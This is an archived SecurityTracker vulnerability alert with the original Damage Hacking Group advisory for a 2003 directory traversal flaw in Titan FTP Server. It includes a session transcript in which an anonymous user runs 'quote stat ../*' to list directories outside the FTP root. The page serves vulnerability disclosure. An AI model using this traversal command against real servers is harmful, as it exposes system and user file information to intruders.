SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (File Transfer/Sharing)  >  Titan FTP Server Vendors:  South River Technologies
Titan FTP Server Discloses Directory Listings to Remote Authenticated Users, Including Anonymous Users
SecurityTracker Alert ID:  1006875
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  May 4 2004
Original Entry Date:  May 29 2003
Impact:  Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Advisory:  Damage Hacking Group
Version(s): 2.02 build 99
Description:  A directory traversal vulnerability was reported in the Titan FTP Server. A remote authenticated user can view directory listings for directories located outside of the FTP root directory.

Damage Hacking Group reported that a remote authenticated user, including an anonymous FTP user, can use the following type of command to "stat" arbitrary directories on the system:

quote stat ../*

A demonstration exploit transcript is provided in the Source Message.
Impact:  A remote user can obtain directory listings and directory information for arbitrary directories on the target server.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.titanftp.com/products/titanftp/index.html (Links to External Site)
Cause:  Input validation error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Thu, 29 May 2003 01:12:42 -0400
Subject:  TitanFTP server directory traversal

 

-----BEGIN PGP SIGNED MESSAGE-----

################################################################
#                     _____   __   __  ___                     #
#             ........\    \.|  |.|  |/   \........            #
#             :       /     \|  | |  |   __>      :            #
#             :      /   _   \  |_|  |  / __      :            #
#             :     /    /    \      | <_/  \     :            #
#             :..../   _/     /  _   |   `   \....:            #
#                : \_________/__| |__|_______/ :               #
#                :   Damage   Hacking   Group  :               #
#                :      Security  Advisory     :               #
#                :.............................:               #
#                                                              #
#                     http://www.dhgroup.org                   #
#b                                                            d#
##b,________________________________________________________.d##
|                                                              |
   Products: TitanFTP server v2.02 build 99 &
            VisNetic FTP server v2.00 build 94

   Authors: www.titanftp.com
            www.deerfield.com

| Vulnerability: directory traversal                           |
#--------------------------------------------------------------#
|                                                              |
   Overview:
   ~~~~~~~~~
   A FTP servers. They seems like a brothers and have identical
   bugs :)
|                                                              |
#--------------------------------------------------------------#
|                                                              |
   Problem:
   ~~~~~~~~

D:\WINNT>ftp 127.0.0.1
Connecting to 127.0.0.1.
220 Titan FTP Server 2.02.99 Ready.
User (127.0.0.1:(none)): anonymous
331 User name okay, need password.
Password:
230-Welcome anonymous from 127.0.0.1. You are now logged into the
server.

230 User logged in, proceed.
ftp> dir
200 PORT command successful.
150 File status okay; about to open data connection.
total 8
d--------- 1 owner group        512 May 24 20:35 .
d--------- 1 owner group        512 May 24 20:35 ..
d--------- 1 owner group        512 May 24 20:35 bin
d--------- 1 owner group        512 May 24 20:35 incoming
d-wx-wx--- 1 owner group        512 May 24 20:35 pub
d--------- 1 owner group        512 May 24 20:35 usr
- -rw------- 1 owner group          6 May 24 21:45 test2.txt
226 Closing data connection. Transferred 451 bytes.
ftp: 451 bytes received in 0,01seconds 45,10 (??/???).
ftp> quote stat ../*
212-Status of *
d--------- 1 owner group        512 May 24 20:35 .
d--------- 1 owner group        512 May 24 20:35 ..
d--------- 1 owner group        512 May 24 20:35 local
- -rw------- 1 owner group          6 May 24 21:45 test1.txt
d--------- 1 owner group        512 May 24 20:35 local
212 End of Status.
ftp> quote stat ../../*
212-Status of *
d--------- 1 owner group        512 May 24 20:33 srtFtpLogs
d--------- 1 owner group        512 May 24 20:35 srtFtpData
- -rw------- 1 owner group          6 May 24 21:51 test.txt
- -rw------- 1 owner group      29632 May 25 00:25 xpl.txt
d--------- 1 owner group        512 May 11 2002 Documents and
Settings
d--------- 1 owner group        512 May 13 22:27 Program Files
d--------- 1 owner group        512 May 22 17:10 WINNT
d--------- 1 owner group        512 May 24 20:35 local
212 End of Status.
ftp> close
221 Session Ended. Downloaded 0KB, Uploaded 0KB. Goodbye anonymous
from 127.0.0.1.
ftp> quit

D:\WINNT>^_^

|                                                              |
#--------------------------------------------------------------#
| Exploit:                                                     |
   ~~~~~~~~
   none
|                                                              |
#--------------------------------------------------------------#
| :wow:                                                        |
    ~~~
    NeKr0 /DHG                                 www.dhgroup.org

|                                                              |
#______________________________________________________________#
  \___________________________da_end___________________________/

Best regards               www.dhgroup.org
   D4rkGr3y                    icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQCVAwUBPtaTXm4LIpseSJmPAQFTVQP/a2gXfMTKitPzfYEQMpeMjcAlyWs6ASUv
xdAzJ4H/tk/moTQpZFNMnRe/KTjyiWuRvEytVa8jGx4VIzg+I8YesolWs2GFR3SA
esle9UjEHA2F8/3HtcoaXLtXHROQp2geA5d936z+nroZ2ePJkwZ7OLhbnz5NJ0mu
B2urs9WG0z0=
=WiSs
-----END PGP SIGNATURE-----


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC